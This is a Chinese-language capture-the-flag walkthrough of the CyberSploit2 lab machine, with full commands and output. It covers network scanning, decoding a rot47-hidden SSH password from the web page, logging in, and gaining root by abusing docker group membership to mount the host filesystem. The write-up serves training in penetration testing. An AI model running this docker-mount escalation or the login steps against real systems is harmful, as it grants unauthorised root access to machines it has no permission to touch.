1、找到靶机ip:192.168.0.131
nmap -sn 192.168.0.0/24
2、扫描靶机端口
root@kali:~# nmap -p- -A 192.168.0.130
Starting Nmap 7.80 ( https://nmap.org )
Nmap scan report for 192.168.0.130
Host is up (0.00070s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 01:1b:c8:fe:18:71:28:60:84:6a:9f:30:35:11:66:3d (DSA)
| 2048 d9:53:14:a3:7f:99:51:40:3f:49:ef:ef:7f:8b:35:de (RSA)
|_ 256 ef:43:5b:d0:c0:eb:ee:3e:76:61:5c:6d:ce:15:fe:7e (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Hello Pentester!
MAC Address: 08:00:27:F1:D7:A0 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.70 ms 192.168.0.130
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.91 seconds
3、访问80端口,几个正常的用户名和密码中间夹杂着一个不正常的用户名和密码
拿去解密,猜可能是要移位,而且是要全部跟着移,使用rot47在线网站成功解密
D92:=6?5C2 4J36CDA=@:E`
shailendra cybersploit1
4、ssh远程登录,用户名和密码:shailendra/cybersploit1,在家目录下发现提示文件:hint.txt,内容是docker,这老朋友了,果断id查看用户组,果然发现是docker组的,二话不说,先看看,本地有没有镜像,发现又没有,又得联网拉取镜像,然后和之前一样的操作了,成功提权,拿到flag
root@kali:~# ssh shailendra@192.168.0.131
shailendra@192.168.0.131's password: cybersploit1(不可见)
There were 3 failed login attempts since the last successful login.
Last login: Wed Jul 15 12:32:09 2020
[shailendra@localhost ~]$ ls
hint.txt
[shailendra@localhost ~]$ cat hint.txt
docker
[shailendra@localhost ~]$ id
uid=1001(shailendra) gid=1001(shailendra) groups=1001(shailendra),991(docker) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[shailendra@localhost ~]$ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
[shailendra@localhost ~]$ docker pull alpine
Using default tag: latest
latest: Pulling from library/alpine
df20fa9351a1: Pull complete
Digest: sha256:185518070891758909c9f839cf4ca393ee977ac378609f700f60a771a2dfe321
Status: Downloaded newer image for alpine:latest
docker.io/library/alpine:latest
[shailendra@bogon ~]$ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
alpine latest a24bb4013296 7 weeks ago 5.57MB
[shailendra@bogon ~]$ docker run -v /:/mnt -it alpine
/ # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/ # cd /mnt/root/
/mnt/root # ls
anaconda-ks.cfg flag.txt get-docker.sh logs}
/mnt/root # cat flag.txt
__ ___ _ __ ___ __ _____ __
/ /` / / \ | |\ | / /`_ | |_) / /\ | | ( (`
\_\_, \_\_/ |_| \| \_\_/ |_| \ /_/--\ |_| _)_)
Pwned CyberSploit2 POC
share it with me twitter@cybersploit1
Thanks !
/mnt/root #